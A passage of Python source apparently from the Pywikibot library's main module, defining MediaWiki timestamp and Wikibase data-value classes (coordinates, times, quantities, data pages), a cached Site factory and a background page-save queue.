'handle_args', 'handleArgs', 'showHelp', 'ui', 'log',
'calledModuleName', 'Bot', 'CurrentPageBot', 'WikidataBot',
'Error', 'InvalidTitle', 'BadTitle', 'NoPage', 'NoMoveTarget',
'SectionError',
'SiteDefinitionError', 'NoSuchSite', 'UnknownSite', 'UnknownFamily',
'UnknownExtension',
'NoUsername', 'UserBlocked', 'UserActionRefuse',
'PageRelatedError', 'UnsupportedPage', 'IsRedirectPage',
'IsNotRedirectPage',
'PageSaveRelatedError', 'PageNotSaved', 'OtherPageSaveError',
'LockedPage', 'CascadeLockedPage', 'LockedNoPage', 'NoCreateError',
'EditConflict', 'PageDeletedConflict', 'PageCreatedConflict',
'UploadWarning',
'ServerError', 'FatalServerError', 'Server504Error',
'CaptchaError', 'SpamfilterError', 'TitleblacklistError',
'CircularRedirect', 'InterwikiRedirectPage',
'WikiBaseError', 'CoordinateGlobeUnknownException',
'QuitKeyboardInterrupt',
)
__all__ += textlib_methods
if PY2:
# T111615: Python 2 requires __all__ is bytes
globals()['__all__'] = tuple(bytes(item) for item in __all__)
for _name in textlib_methods:
target = getattr(textlib, _name)
wrapped_func = redirect_func(target, since='20140820')
globals()[_name] = wrapped_func
deprecated = redirect_func(__deprecated)
deprecate_arg = redirect_func(_deprecate_arg)
if sys.version_info[:2] == (2, 7) and sys.version_info[2] in (2, 3):
warn(
'Pywikibot will soon drop support for Python 2.7.2 and 2.7.3, '
'please update your Python.',
FutureWarning,
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
passed provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.getcurrenttime() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep='T'):
"""ISO8601 format string.
@param sep: one-character separator, placed between the date and time
@type sep: str
@return: ISO8601 format string
@rtype: str
"""
assert(len(sep) == 1)
return '%Y-%m-%d{0}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep='T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
@param ts: ISO 8601 timestamp or a Timestamp object already
@type ts: str ot Timestamp
@param sep: one-character separator, placed between the date and time
@type sep: str
@return: Timestamp object
@rtype: Timestamp
"""
# If inadvertantly passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
# If inadvertantly passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
toISOformat = redirect_func(isoformat, old_name='toISOformat',
class_name='Timestamp', since='20141219')
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super(Timestamp, self).__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
else:
return newdt
def __sub__(self, other):
"""Perform substraction, returning a Timestamp instead of datetime."""
newdt = super(Timestamp, self).__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
else:
return newdt
class Coordinate(_WbRepresentation):
"""
Class for handling and storing Coordinates.
For now its just being used for DataSite, but
in the future we can use it for the GeoData extension.
"""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat, lon, alt=None, precision=None, globe=None,
typ='', name='', dim=None, site=None, globe_item=None):
"""
Represent a geo coordinate.
@param lat: Latitude
@type lat: float
@param lon: Longitude
@type lon: float
@param alt: Altitude? TODO FIXME
@param precision: precision
@type precision: float
@param globe: Which globe the point is on
@type globe: str
@param typ: The type of coordinate point
@type typ: str
@param name: The name
@type name: str
@param dim: Dimension (in meters)
@type dim: int
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
@type globe_item: pywikibot.ItemPage or str
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownException(
'%s is not supported in Wikibase yet.'
% self.globe)
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self):
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
@return: Wikibase JSON
@rtype: dict
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data, site):
"""
Constructor to create an object from Wikibase's JSON output.
@param data: Wikibase JSON
@type data: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self):
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
@rtype: float or None
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self):
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get:
dim = math.radians(
precision)*radius*math.cos(math.radians(self.lat))
But this is not valid, since it returns a float value for dim which is
an integer. We must round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
@rtype: int or None
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
def get_globe_item(self, repo=None, lazy_load=False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
@type repo: pywikibot.site.DataSite
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@type lazy_load: bool
@return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self, year=None, month=None, day=None,
hour=None, minute=None, second=None,
precision=None, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
@param year: The year as a signed integer of between 1 and 16 digits.
@type year: long
@param month: Month
@type month: int
@param day: Day
@type day: int
@param hour: Hour
@type hour: int
@param minute: Minute
@type minute: int
@param second: Second
@type second: int
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = long(year)
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site %s has no data repository' % Site())
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "%s"' % precision)
@classmethod
def fromTimestr(cls, datetimestr, precision=14, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
* The year is always signed and having between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
@param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
@type datetimestr: str
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '%s'" % datetimestr)
t = match.groups()
return cls(long(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision=14, before=0, after=0,
timezone=0, calendarmodel=None, site=None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
@param timestamp: Timestamp
@type timestamp: pywikibot.Timestamp
@param precision: The unit of the precision of the time.
@type precision: int or str
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@type before: int
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@type after: int
@param timezone: Timezone information in minutes.
@type timezone: int
@param calendarmodel: URI identifying the calendar model
@type calendarmodel: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso=False):
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
@param force_iso: whether the output should be forced to ISO 8601
@type force_iso: bool
@return: Timestamp in a format resembling ISO 8601
@rtype: str
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self):
"""
Convert the data to a pywikibot.Timestamp.
@return: Timestamp
@rtype: pywikibot.Timestamp
@raises ValueError: instance value can not be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb, site=None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site):
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site item is supplied it raises a warning and returns True.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: bool
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value):
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
@param value: decimal number to convert
@type value: str
@rtype: Decimal
"""
if isinstance(value, Decimal):
return value
elif value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value):
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
@param value: decimal number to convert
@type value: Decimal
@rtype: str
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None, site=None):
"""
Create a new WbQuantity object.
@param amount: number representing this quantity
@type amount: string or Decimal. Other types are accepted, and
converted via str to Decimal.
@param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
@type unit: pywikibot.ItemPage, str or None
@param error: the uncertainty of the amount (e.g. ±1)
@type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, basestring) and \
unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo=None, lazy_load=False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
@type repo: pywikibot.site.DataSite
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@type lazy_load: bool
@return: pywikibot.ItemPage
"""
if not isinstance(self._unit, basestring):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb, site=None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text, language):
"""
Create a new WbMonolingualText object.
@param text: text string
@type text: str
@param language: language code of the string
@type language: str
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self):
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb):
"""
Create a WbMonolingualText from the JSON data given by Wikibase API.
@param wb: Wikibase JSON
@type wb: dict
@rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
Note that this class cannot be used directly
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site):
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
@param site: The Wikibase site
@type site: pywikibot.site.APISite
@rtype: pywikibot.site.APISite
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: pywikibot.site.APISite, site serving as a repository for
the given data type.
@param site: The Wikibase site
@type site: pywikibot.site.APISite
@rtype: dict
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending, label):
"""
Validate the provided page against general and type specific rules.
@param page: Page containing the data.
@type text: pywikibot.Page
@param data_site: The site serving as a repository for the given
data type.
@type data_site: pywikibot.site.APISite
@param ending: Required filetype-like ending in page titles.
E.g. '.map'
@type ending: str
@param label: Label describing the data type in error messages.
@type site: str
"""
if not isinstance(page, Page):
raise ValueError('Page must be a pywikibot.Page object.')
# validate page exists
if not page.exists():
raise ValueError('Page must exist.')
# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {0}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {0} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') or \
not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{0}' "
'for {1}.'.format(ending, label))
def __init__(self, page, site=None):
"""
Create a new _WbDataPage object.
@param page: page containing the data
@type text: pywikibot.Page
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self):
"""
Convert the data to the value required by the Wikibase API.
@return: title of the data page incl. namespace
@rtype: str
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name, site):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
@param page_name: page name from Wikibase value
@type page_name: str
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site):
"""
Return the site serving as a geo-shape repository.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.site.APISite
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for WbGeoShape.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: dict
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site):
"""
Return the site serving as a tabular-data repository.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: pywikibot.site.APISite
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site):
"""
Return the specifics for WbTabularData.
@param site: The Wikibase site
@type site: pywikibot.site.DataSite
@rtype: dict
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
This will prevent the bot from breaking completely when a new type
is introduced.
This data type is just a json container
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
@param json: Wikibase JSON
@type: dict
"""
self.json = json
def toWikibase(self):
"""
Return the JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
return self.json
@classmethod
def fromWikibase(cls, json):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
@param json: Wikibase JSON
@type json: dict
@rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
_url_cache = {} # The code/fam pair for each URL
def _code_fam_from_url(url):
"""Set url to cache and get code and family from cache.
Site helper method.
@param url: The site URL to get code and family
@type url: string
@raises SiteDefinitionError: Unknown URL
"""
if url not in _url_cache:
matched_sites = []
# Iterate through all families and look, which does apply to
# the given URL
for fam in config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
# TODO: As soon as AutoFamily is ready, try and use an
# AutoFamily
raise SiteDefinitionError("Unknown URL '{0}'.".format(url))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{0}": {1} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
_url_cache[url] = matched_sites[0]
return _url_cache[url]
def Site(code=None, fam=None, user=None, sysop=None, interface=None, url=None):
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
@param code: language code (override config.mylang)
@type code: string
@param fam: family name or object (override config.family)
@type fam: string or Family
@param user: bot user name to use on this site (override config.usernames)
@type user: unicode
@param sysop: sysop user to use on this site (override config.sysopnames)
@type sysop: unicode
@param interface: site class or name of class in pywikibot.site
(override config.site_interface)
@type interface: subclass of L{pywikibot.site.BaseSite} or string
@param url: Instead of code and fam, does try to get a Site based on the
URL. Still requires that the family supporting that URL exists.
@type url: string
@rtype: pywikibot.site.APISite
@raises ValueError: URL and pair of code and family given
@raises ValueError: Invalid interface name
@raises SiteDefinitionError: Unknown URL
"""
_logger = 'wiki'
if url:
# Either code and fam or only url
if code or fam:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url)
else:
# Fallback to config defaults
code = code or config.mylang
fam = fam or config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = config.usernames['*'].copy()
code_to_user.update(config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
code_to_sysop = config.sysopnames['*'].copy()
code_to_sysop.update(config.sysopnames[family_name])
sysop = sysop or code_to_sysop.get(code) or code_to_sysop.get('*')
if not isinstance(interface, type):
# If it isnt a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {0}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface=%s' % interface.__name__)
user = normalize_username(user)
key = '%s:%s:%s:%s' % (interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user, sysop=sysop)
debug("Instantiated %s object '%s'"
% (interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site %s instantiated using different code "%s"'
% (_sites[key], code), UserWarning, 2)
return _sites[key]
# alias for backwards-compability
getSite = redirect_func(Site, old_name='getSite', since='20150924')
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Page,
FilePage,
Category,
Link,
User,
ItemPage,
PropertyPage,
Claim,
)
from pywikibot.page import ( # noqa: E402
html2unicode, url2unicode, unicode2html)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
@__deprecated('comment parameter for page saving method', since='20140604')
def setAction(s):
"""Set a summary to use for changed page submissions."""
config.default_edit_summary = s
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=(remainingPages * config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
while _putthread.isAlive() and page_put_queue.qsize() > 0:
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {0} pages remaining in the queue. '
'Estimated time remaining: {1}\nReally exit?'
''.format(*remaining()),
default=False, automatic_quit=False):
return
# only need one drop() call because all throttles use the same global pid
try:
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
except IndexError:
pass
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.isAlive():
try:
page_put_queue.mutex.acquire()
try:
_putthread.start()
except (AssertionError, RuntimeError):
pass
finally:
page_put_queue.mutex.release()
page_put_queue.put((request, args, kwargs))
# queue to hold pending requests
page_put_queue = Queue(config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr('ImagePage', FilePage, since='20140924')
wrapper._add_deprecated_attr(
'cookie_jar', replacement_name='pywikibot.comms.http.cookie_jar',
since='20150921')
wrapper._add_deprecated_attr(
'PageNotFound', _DeprecatedPageNotFoundError,
warning_message=('{0}.{1} is deprecated, and no longer '
'used by pywikibot; use http.fetch() instead.'),
since='20140924')
wrapper._add_deprecated_attr(
'UserActionRefuse', _EmailUserError,
warning_message='UserActionRefuse is deprecated; '
'use UserRightsError and/or NotEmailableError instead.',
